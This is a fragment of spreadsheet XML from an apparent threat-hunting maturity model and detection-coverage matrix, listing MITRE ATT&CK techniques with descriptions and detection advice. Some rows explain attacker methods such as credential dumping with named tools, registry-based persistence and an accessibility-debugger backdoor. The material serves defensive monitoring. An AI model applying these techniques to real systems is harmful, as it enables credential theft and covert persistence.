      <t xml:space="preserve"> - Required data (values or fields) is missing 50%-75%.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Data Retention</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data is retained 25%-50% of the time needed or defined by the organization.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Extra timezones identified in order to cover at least local and UTC times (not fixed yed).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion time only automatically generated.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 25%-50% across all data sources.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 25%-50% across all data sources.</t>
    </r>
  </si>
  <si>
    <t>Good</t>
  </si>
  <si>
    <t>Tools helping you correlate and integrate numerous data types across all your endpoints in order to filter out noise and potential false positives. Here is where you star using a few basic Data Science capabilities provided by your tools (i.e ELK Enterprise) in order to make sense of all the data that you have in your central repository (Better Automation).</t>
  </si>
  <si>
    <t>Your team has a better understanding of the environment and has documented several parts of the network already.
An internal repository (Wiki or Internal Github) exists where hunters are already documenting specific analytics and procedures to validate the detection of adversary techniques.
Your team starts using basic data science techniques to validate the detection of specific techniques.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Endpoint Coverage</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - required data source is available from  50% - 75% of your network endpoints.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Missing Data</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data (values or fields) is missing 25%-50%.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Data Retention</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data is retained 50%-75% of the time needed or defined by the organization.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Extra timezones configured in order to cover at least local and UTC times
 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ingestion time automatically generated and Creation time capability identified</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 50%-75% across all data sources</t>
    </r>
  </si>
  <si>
    <t>Very Good</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Tools helping you leverage more than just simple outlier detection techniques. Here is where the capability of using advanced data science techniques are posible with the right libraries and plugins provided by your tools with access to your data (i.e Integration of Spark Analytics). (Remember, data science concepts such as machine learning might not be applicable to every single use case or technique that you are trying to detect). If you can validate the detection of an adversay technique by just applying basic data science techniques, then you might be already in the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>"Very Good"</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> level.
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Your team already understands the data sources available to hunt and is already learning advanced procedures to manipulate the data with the right tools.
Your team starts using advanced data science techniques to detect the known and unknown.
A complete hunt program is documented and already being used for official hunting campaigns.
</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Endpoint Coverage </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- required data source is available from  50% - 75% of your network endpoints
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Missing Data </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- Required data (values or fields) is missing 0-25%
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Data Retention</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data is retained 75%-100% of the time needed or defined by the organization.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Timezones</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Extra timezones configured in order to cover at least local and UTC times
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ingestion vs Creation</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Ingestion  and Creation time configured to be available as two different fields and used to reduce latency.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 50%-75% across all data sources
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <t>Excellent</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Besides having the appropriate tools , it is important to be able to integrate themwith other platforms (processes) being used in other teams across your security department (IR Ticketing system, Intel Platforms (not just to ingest IOCs, but to document hunting campaign results that might turn into actionable intelligence), etc). This is more specific to your organization and flexibility of your hunting tools play a big role here (i.e API access) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="18"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Your team already understand the environment very well and has complete documentation of the network.
Your team also has great institutional knowlegde of your organization (CRITICAL FOR HUNTING).
Your team has great intuition and is capable to determine what is evil or not faster. Here is where your team is also helping either the vendor or internal data scientists to improve/update machine learning models to reduce the number of false positives (Advanced Skills to have as a hunter). </t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Endpoint Coverage </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- required data source is available from  75%-100% of your network endpoints
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Missing Data</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data (values or fields) is missing 0%-25%
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Data Retention</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data is retained 75%-100% of the time needed or defined by the organization</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Timezones </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- Extra timezones configured in order to cover at least local and UTC times
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>ingestion and creation time difference has been reduced to the minimun.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 75%-100% across all data sources
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 75%-100% across all data sources</t>
    </r>
  </si>
  <si>
    <t>Period</t>
  </si>
  <si>
    <t>2018 - Q4</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Tactics</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Technical Description</t>
  </si>
  <si>
    <t>Detection Approach</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Detection Score</t>
  </si>
  <si>
    <t>Average</t>
  </si>
  <si>
    <t>EDR DS Coveage%</t>
  </si>
  <si>
    <t>EDR Coverage BIN</t>
  </si>
  <si>
    <t>SYSMON DS Coverage%</t>
  </si>
  <si>
    <t>SYSMON Coverage BIN</t>
  </si>
  <si>
    <t>BLUEPROXY DS Coverage%</t>
  </si>
  <si>
    <t>BLUEPROXY Coverage BIN</t>
  </si>
  <si>
    <t>AV-1 Coverage %</t>
  </si>
  <si>
    <t>AV-1 Coverage BIN</t>
  </si>
  <si>
    <t>AV-2 Coverage %</t>
  </si>
  <si>
    <t>AV-2 Coverage BIN</t>
  </si>
  <si>
    <t>BRO Coverage %</t>
  </si>
  <si>
    <t>BRO Coverage BIN</t>
  </si>
  <si>
    <t>MOLOCH Coverage %</t>
  </si>
  <si>
    <t>MOLOCH Coverage BIN</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>In order to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen hackers use many methods, including Base64 encoding the message body of an HTTP request, adding junk data to protocol traffic, using steganography, or commingling legitimate traffic with C2 communications traffic.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>T1002</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</si>
  <si>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</si>
  <si>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Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.</t>
  </si>
  <si>
    <t>File monitoring,Binary file metadata,Process command-line parameters,Process monitoring,Network device logs,Data loss prevention</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t xml:space="preserve">Credential dumping is the process of obtaining account login and password information from the operating system and software. Credentials can be used to perform Lateral Movement and access restricted information. Tools may dump credentials in many different ways: extracting credential hashes for offline cracking, extracting plaintext passwords, and extracting Kerberos tickets, among others. Examples of credential dumpers include pwdump7, Windows Credential Editor, Mimikatz, and gsecdump. </t>
  </si>
  <si>
    <t>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 which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,PowerShell logs,Windows event logs</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>Winlogon is a part of some Windows versions that performs actions at logon. In Windows systems prior to Windows Vista, a Registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.</t>
  </si>
  <si>
    <t>Monitor for changes to registry entries in HKLM\Software\Microsoft\Windows NT\Winlogon\Notify that do not correlate with known software, patch cycles, etc</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Network device logs</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,PowerShell logs,API monitoring</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through PowerShell, additional logging of PowerShell scripts is recommended. </t>
  </si>
  <si>
    <t>File monitoring,API monitoring,Process command-line parameters,PowerShell logs</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.</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</si>
  <si>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information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows . Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve"> Malware reverse engineering,Process monitoring,Process use of Network</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration could occur over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, or Bluetooth. Adversaries could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a mouse click or key press) but access the network without such may be malicious.</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information about the operating system, configuration, software, and security. Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>Interaction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,API Monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL must be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. Adversaries can use this technique to load malicious code at startup that will persist on system reboot. This same functionality is achieved by creating specifically formatted Registry keys at HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.</t>
  </si>
  <si>
    <t>Monitor process API calls to AddMonitor.
Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
Monitor registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
Run the Autoruns utility, which checks for this Registry key as a persistence mechanism</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkits are programs that hide the existence of malware by intercepting and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the Basic Input/Output System. Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR.</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls,DLL monitoring,Services</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>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
On Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Authentication logs,Process command-line parameters</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>Adversaries will likely look for details about the network configuration and settings of systems they access. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>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Examples of tools and commands that acquire this information include "ping" or "net view" using Net.</t>
  </si>
  <si>
    <t>Network protocol analysis,Process command-line parameters,Process monitoring,Process use of network,API Monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>The BIOS (Basic Input/Output System), which underlies the functionality of a computer, may be modified to perform or assist in malicious activity.
Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
The Unified Extensible Firmware Interface (UEFI) is new specification for the interface between platform firmware and a computer operating system.</t>
  </si>
  <si>
    <t>Firmware manipulation may be detected. Dump and inspect BIOS images on vulnerable systems and compare against known good images. Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>BIOS,EFI</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network,Network device logs</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>An adversary may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>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 Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.
</t>
  </si>
  <si>
    <t>File monitoring,Binary file metadata,Process command-line parameters,Process monitoring,DLL monitoring,Data loss prevention</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>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 to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors.</t>
  </si>
  <si>
    <t>If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.In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when communications do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.</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</si>
  <si>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Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>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</si>
  <si>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Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system.</t>
  </si>
  <si>
    <t>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t>
